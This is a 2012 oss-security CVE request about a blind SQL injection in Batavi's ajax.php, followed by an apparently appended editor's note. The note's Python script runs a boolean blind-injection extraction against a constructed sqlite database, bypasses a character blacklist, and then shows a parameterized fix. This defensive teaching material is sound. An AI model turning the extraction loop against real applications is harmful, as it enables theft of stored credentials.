Date: Wed, 18 Jan 2012 14:31:19 +0100
From: Ronald van den Blink <oss-security@...urityview.nl>
To: oss-security@...ts.openwall.com
Subject: CVE request - Batavi 1.2.1 Fixes Blind SQL Injection vulnerability in boxToReload parameter of ajax.php

Hi,

Can we please have a CVE assigned for the following fix in Batavi 1.2.1 (http://sourceforge.net/projects/batavi/files/).

As pointed out by Canberk BOLAT of Mavituna Security, versions before 1.2.1 have a Blind SQL Injection vulnerability in the boxToReload parameter of ajax.php. This has been fixed in Batavi 1.2.1.

Relevant part of the changelog:

For details about the changes of the downloaded version you'll find a changes.txt in the root folder of the package.

Version 1.2.1

[..]

Security:

- Fixed SQL injection in modules;
- Improved methods of Database to handle it;
- All data which come from the user go via a special check to strip all dangerous values.

[..]

With kind regards,

Ronald van den Blink
Project Manager 
Iceshop BV

Iceshop BV is the main contributor to the next generation open source e-commerce software Batavi. Batavi is the first open source e-commerce software that can easily handle more than 100.000 products and has native Icecat (www.icecat.biz) integration.
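Editor's note: the changelog above describes the fix as a check that strips "dangerous values" from user input. The following Python illustration is added here and is not Batavi's code; it uses a hypothetical `boxes`/`admins` schema and a hypothetical query built from a `boxToReload`-style parameter to show what a boolean-based blind SQL injection against such a parameter looks like, why a blacklist that strips quotes, semicolons and comment markers does not stop it (a numeric context needs none of those characters), and why a typed allowlist plus a parameterized query does. The exploit loop and the stripped character list are assumptions made for the demonstration only.

```python
import sqlite3


def make_db():
    """Constructed sample database (not Batavi's schema): a few content boxes plus a secret."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE boxes (id INTEGER PRIMARY KEY, name TEXT, content TEXT)")
    conn.executemany(
        "INSERT INTO boxes VALUES (?, ?, ?)",
        [(1, "cart", "<div>cart</div>"), (2, "search", "<div>search</div>"), (3, "news", "<div>news</div>")],
    )
    conn.execute("CREATE TABLE admins (user TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO admins VALUES ('admin', 'secret')")
    return conn


def reload_box_vulnerable(conn, box_to_reload):
    """Hypothetical vulnerable handler: the request parameter is concatenated into SQL.

    The caller only learns whether a box rendered (True/False), which is exactly the
    yes/no oracle a blind injection needs."""
    sql = "SELECT content FROM boxes WHERE id = " + box_to_reload
    return conn.execute(sql).fetchone() is not None


def strip_dangerous(value):
    """Blacklist cleanup of the kind a 'strip all dangerous values' check performs (assumed list)."""
    for bad in ("'", '"', ";", "--", "/*", "*/"):
        value = value.replace(bad, "")
    return value


def reload_box_stripped(conn, box_to_reload):
    """Same concatenation, but input passes through the blacklist first."""
    return reload_box_vulnerable(conn, strip_dangerous(box_to_reload))


def reload_box_parameterized(conn, box_to_reload):
    """Hardened handler: allowlist the type (an integer id) and bind it as a parameter."""
    try:
        box_id = int(box_to_reload)
    except ValueError:
        return False
    row = conn.execute("SELECT content FROM boxes WHERE id = ?", (box_id,)).fetchone()
    return row is not None


def blind_probe(reload_fn, conn, condition):
    """Ask the oracle 'is <condition> true?' by appending it to a known-good id."""
    return reload_fn(conn, "1 AND (" + condition + ")")


def extract_secret(reload_fn, conn, max_len=32):
    """Recover admins.pw_hash one character at a time through the boolean oracle.

    The probe uses only digits, parentheses and built-in functions: no quote, semicolon
    or comment marker, so a blacklist that strips those characters leaves it intact."""
    secret = ""
    for pos in range(1, max_len + 1):
        found = None
        for code in range(32, 127):
            cond = "unicode(substr((SELECT pw_hash FROM admins LIMIT 1), %d, 1)) = %d" % (pos, code)
            if blind_probe(reload_fn, conn, cond):
                found = chr(code)
                break
        if found is None:  # past the end of the string: substr() is '' and unicode('') is NULL
            break
        secret += found
    return secret or None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", extract_secret(reload_box_vulnerable, db))
    print("stripped     :", extract_secret(reload_box_stripped, db))
    print("parameterized:", extract_secret(reload_box_parameterized, db))
```

Against the concatenating handler the probe recovers the secret whether or not the blacklist is applied; against the parameterized handler every probe is rejected at the `int()` check and nothing leaks. The practical lesson for a fix like the one in the changelog is to verify that the parameter is bound, not merely filtered.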
